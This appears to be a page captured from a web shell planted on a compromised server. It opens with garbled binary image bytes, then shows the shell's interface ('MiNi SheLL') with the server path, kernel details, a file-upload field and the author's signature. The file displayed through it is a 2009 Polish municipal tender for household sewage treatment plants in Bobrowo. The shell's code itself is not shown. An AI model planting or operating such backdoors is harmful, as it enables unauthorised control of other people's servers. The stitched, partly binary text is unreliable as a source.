JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/135140-N-2009.html

<p class="kh_header"><b>Bobrowo: Budowa przydomowych oczyszczalni ścieków w Gminie Bobrowo.</b><br>
<b>Numer ogłoszenia: 135140 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , 27, 87-327 Bobrowo, woj. kujawsko-pomorskie, tel. 056 495-18-24, faks 056 495-18-10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bobrowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przydomowych oczyszczalni ścieków w Gminie Bobrowo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybudowanie 22 przydomowych oczyszczalni ścieków w:   Brudzawach - 4 szt, Buczku - 4 szt, Kruszyny Duże - 2 szt, Kruszyny Rumunki. - 1 szt, Nieżywięć - 5 szt, Wichulec - 2 szt., Wymokłym - 1 szt. oraz w Zgniłobłotach - 3 szt.
Uwaga: W przypadku rezygnacji zainteresowanego z budowy, ilość przydomowych oczyszczalni do wykonania może ulec zmniejszeniu.
     Szczegółowy opis zakresu robót oraz technologia ich wykonania, projekty zagospodarowania terenu, schematy oczyszczalni, przekroje przez oczyszczalnię, dokumentacja geologiczna, przedmiary robót oraz specyfikacja techniczna wykonania i odbioru robót zostały  załączone do SIWZ  w wersji elektronicznej. 
1.1. Zakres prac oraz odpowiedzialności Wykonawcy w zakresie objętym proponowaną cena ofertowa obejmuje także:
a)  roboty wykonać zgodnie z projektami budowlanymi,
b)  zapewnić obsługę geodezyjną inwestycji a po zakończeniu robót wykonać inwentaryzację geodezyjną powykonawczą,         
1.2. Wymagania jakościowe i materiałowe.
a)  do wykonania zamówienia wykonawcy zobowiązani są użyć materiałów i urządzeń w I gatunku, zakupionych u renomowanych producentów, gwarantujących najwyższą jakość, o parametrach technicznych i jakościowych nie gorszych niż określone w dokumentacji technicznej i przedmiarze robót,
b)  występujące w dokumentacji i przedmiarach nazwy, typy i pochodzenie produktów nie są dla wykonawców wiążące ale winni oni uwzględnić możliwość zapewnienia jednolitej obsługi technicznej zamontowanych urządzeń u zamawiającego,
c)  zamawiający dopuszcza składanie ofert z użyciem materiałów równoważnych do 
materiałów określonych w dokumentacji projektowej, pod warunkiem, że ich parametry będą odpowiadały parametrom określonym w dokumentacji projektowej,
d)  wykonawca składający ofertę na materiały równoważne będzie obowiązany do 
 zapewnienia i udokumentowania ich równoważności,
e)  zabrania się stosowania materiałów nie odpowiadających wymaganiom Polskiej Normy oraz innym określonych w projekcie, wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na ich zastosowanie/wbudowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości),
f)  wykonawca zapewni, aby tymczasowo składowane materiały, do czasu gdy będą one potrzebne do robót, były zabezpieczone przed zniszczeniem, zachowały swoją jakość i właściwości oraz były dostępne do kontroli przez Inspektora Nadzoru,
2.  Dostępność dokumentacji projektowej.
a)  dokumentacje budowlane poszczególnych oczyszczalni umieszczone zostały na stronie zamawiającego www.bobrowo.bip.net.pl lub są do wglądu w siedzibie zamawiającego (pok. nr 15) 
b)  wykonawca zobowiązuje się zdobyć informacje konieczne do właściwego wykonania zamówienia w tym zapoznać się z przyszłymi placami budowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca winien wnieść wadium w wysokości 2.000,00 zł (słownie: dwa tysiące złotych).     
1.  Wadium w formie pieniężnej należy wnieść przelewem rachunek bankowy 
     zamawiającego: 
     -  Bank Spółdzielczy w Brodnicy, Filia Bobrowo
     -  nr rachunku 22 9484 1150 1400 0101 2014 0030
     z dopiskiem na blankiecie przelewu, Wadium na budowę przydomowych oczyszczalni ścieków ścieków w Gminie Bobrowo. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.  
2.  Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancja ubezpieczeniowej lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, należy załączyć w formie nienaruszonego oryginału do oferty.  
3.  Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji  gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone  przez zamawiającego w terminie związania z ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5  ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział wykonawcy, którzy:
1)  są uprawnieni do występowania w obrocie prawny zgodnie z wymaganiami ustawowymi,   
2)  wykonawcy składający ofertę wspólną przedstawią do oferty umowę o solidarnej odpowiedzialności oraz o wyznaczeniu spośród siebie strony wiodącej tj. Lidera, który będzie reprezentował związane konsorcjum przed zamawiającym, 
3)  posiadają niezbędne uprawnienia lub kwalifikacje do wykonywania zamówienia, w tym 
     względzie:
     a)  kierownik budowy i kierownicy robót - uprawnienia budowlane i co najmniej 3 letnie doświadczenie w kierowaniu robotami o zakresie objętym zamówieniem  
 odpowiadające wymaganiom określonym w art. 12 ust.7 ustawy z dnia 7 lipca 1994r. Prawo budowlane (jednolity tekst Dz.U. z 2003r. Nr 207, poz. 216 z późn.zm.),
     b)  kadra kierowania robotami (kierownik budowy musi być wpisana na  listę Okręgowej Izby Inżynierów Budownictwa (Dz.U. z 2001r. Nr 5, poz. 42 z późn.zm.). 
4)  posiadają niezbędną wiedzę, doświadczenie oraz potencjał techniczny gwarantujący wykonanie zamówienia, dysponują pracownikami zdolnymi do wykonania zadania, w tym 
      względzie:
      - wykonali w okresie ostatnich 5 lat minimum 2 roboty budowlane, polegające na budowie przydomowych oczyszczalni ścieków, każda o wartości nie mniejszej niż 150.000,00 PLN, potwierdzone dokumentami ( np. protokółami odbioru końcowego) lub referencjami zawierającymi: ilość,  termin realizacji i wartość wybudowanych przydomowych oczyszczalni ścieków, potwierdzających ich należyte wykonanie,
5)   po zakończeniu robót uporządkują teren, sporządzą geodezyjną dokumentację 
 powykonawczą,
6)   nie podlegają wykluczeniu w rozumieniu art. 24 ust.1 pkt 1-8 oraz art. 24 ust.2 pkt 2, a dodatkowo z art. 24 ust.1 pkt 9 ustawy Prawo zamówień publicznych, 
7)  wykonają roboty budowlane zgodnie z Roz. Min. Inf. z dnia 23 czerwca 2003 r. w sprawie szczegółowego zakresu i formy planu bezpieczeństwa i ochrony zdrowia oraz szczegółowego zakresu rodzajów robót budowlanych, stanowiących zagrożenia bezpieczeństwa i zdrowia ludzi (Dz. U. Z 2003 r. Nr 120 poz. 1126), 
8)  udzielą gwarancji jakości za wykonanie roboty i zamontowanie urządzenia na okres 36 miesięcy (3 lata) licząc od dnia odbioru końcowego, 
9)  ubezpiecza budowę od odpowiedzialności cywilnej,
10) dokonają wszelkich czynności związanych z rozruchem oczyszczalni wraz z udzieleniem instruktażu eksploatacji oczyszczalni ich użytkownikom, przekażą użytkownikowi jedno opakowanie biopreparatu zalecanego do stosowania dla wybudowanej oczyszczalni,
11)  zamówienie wykonają w terminie nie później niż do dnia 31 sierpnia 2009 r..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający oceni spełnienie warunków wymienionych w rozdziale V niniejszej SIWZ na podstawie złożonych do oferty oświadczeń i dokumentów.
Oceny spełniania warunków dokona komisja przetargowa powołana do oceny ofert.
Ocena spełnienia warunków będzie dokonana na zasadzie: spełnia / nie spełnia. 
Wykonawca, który nie udokumentuje spełnienia wymienionych wymagań zostanie wykluczony z postępowania, a jego oferta odrzucona.
Na potwierdzenie spełnienia warunków zawartych w rozdziale V, zamawiający wymaga złożenia do oferty następujących oświadczeń i dokumentów:

- Dokumenty oferty należy ułożyć wg kolejności
1. Ofertę na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym załącznik  Nr 1. 
2. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji 
 działalności gospodarczej upoważniające do występowania w obrocie prawnym,  
 wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  Zaświadczenie o wpisie do ewidencji działalności gospodarczej  musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie j.w. 
Dodatkowo
- umowę regulującą współpracę podmiotów występujących wspólnie (np. konsorcja-   umowa o konsorcjum na zadanie objęte zamówieniem) zawierająca:
   - zapis o solidarnej odpowiedzialności,
   - czas trwania umowy (wymaga się, aby czas trwania umowy nie był krótszy  
     niż okres realizacje zamówienia oraz okres gwarancji),
     - podmiot wiodący - lidera,
     - podział odpowiedzialności członków konsorcjum,
     - nazwę zamawiającego,
     - przedmiot zamówienia, 
3. Oświadczenia: - załącznik Nr 2
    a) o okresie gwarancji jakości na wykonane roboty - 36 miesięcy, licząc od dnia odbioru końcowego, 
    b) o uporządkowaniu terenu po zakończeniu robót,
    c) o sporządzeniu geodezyjnej dokumentacji powykonawczej,
    d) o zaakceptowaniu warunków zapłaty określonych w rozdziale III pkt 15 c,
    e)  o ubezpieczeniu budowy od odpowiedzialności cywilnej,
    f)  o dokonaniu wszelkich czynności związanych z rozruchem oczyszczalni wraz z udzieleniem instruktażu ich eksploatacji użytkownikom,
    g) o przekazaniu użytkownikowi jednego opakowania biopreparatu zalecanego do stosowania dla wybudowanej oczyszczalni,

Uwaga:
W/w oświadczenia należy złożyć na jednej kartce w kolejności jak w pkt. 3. 
4. Zaświadczenia o nie zaleganiu, zwolnieniu, odroczeniu (lub rozłożeniu na raty zaległych płatności) płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne wystawione przez właściwy terenowo Urząd Skarbowy i Zakład Ubezpieczeń Społecznych 
    - wystawione nie wcześniej niż 3 miesiące licząc od daty wystawienia do dnia składania ofert. 
5. Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy licząc od daty wystawienia  do dnia składania ofert.
6. Informacje z Krajowego Rejestru Karnego dla podmiotów zbiorowych w zakresie 
określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy licząc od daty wystawienia do dnia składania ofert.
7.  Oświadczenia: - załącznik Nr 2
8. Wypełnione następujące załączniki:
    Nr 3 - oświadczenie w trybie art. 24 ustawy Prawo zamówień publicznych,
    Nr 4 - oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych,
    Nr 6 - wykaz zrealizowanych robot,
9. Informacja o podwykonawcach załącznik nr 5.
10. Opinie inwestorów, użytkowników przydomowych oczyszczalni ścieków 
potwierdzających, że roboty zostały wykonane z należyta starannością, które wymieniono wykazie, zał. Nr 6.
11. Polisę ubezpieczeniową wykonawcy potwierdzającą ubezpieczenie od OC w zakresie prowadzonej działalności.
12. Kopię dowodu wniesienia wadium.
13. Wykaz kadry kierowniczej wraz z niezbędnymi uprawnieniami  (wskazanie kierownika budowy) oraz kopie wpisu na OIIB.   
14. Podpisany wzór umowy stanowiący załącznik Nr 7. 
15. Cena ofertowa (kosztorys ofertowy) - opracowana na podstawie dokumentacji  
 projektowych i dokonanej wizji lokalnej, załączonych nakładów rzeczowych 
 (przedmiarów robót, kosztorysów ślepych wskazujących zakres robót). Każdą 
 oczyszczalnię należy wycenić oddzielnie i wycenę dołączyć do oferty. 
 Cena ofertowa (kosztorys ofertowy)- stanowić będzie podstawę do oceny ofert. 
16. Każda z firm wspólnie składających ofertę (konsorcjum) oraz Podwykonawcy złożą następujące dokumenty:
1) zaświadczenia uprawniające do występowania w obrocie prawnym,
2) załącznik Nr 2,3, 4,7,
3) zaświadczenie o nie zaleganiu z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne (US, ZUS),
Ważność dokumentów- j.w.
W przypadku składania oferty wspólnej (konsorcjum) oferta, kosztorysy ofertowe, a także wzór umowy muszą być podpisane przez wszystkie podmioty lub podmiot o ile taka reprezentacja wynika z umowy.    
Kopie dokumentów muszą być potwierdzone za zgodnością z oryginałem przez  wykonawcę lub osobę posiadającą odpowiednie pełnomocnictwo. 
 Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli w/w oświadczeń lub dokumentów, lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bobrowo.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Bobrowie, 87-327 Bobrowo, pok.nr 15 w godzinach urzędowania..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: Urząd Gminy w Bobrowie, 87-327 Bobrowo - pokój nr 12, sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com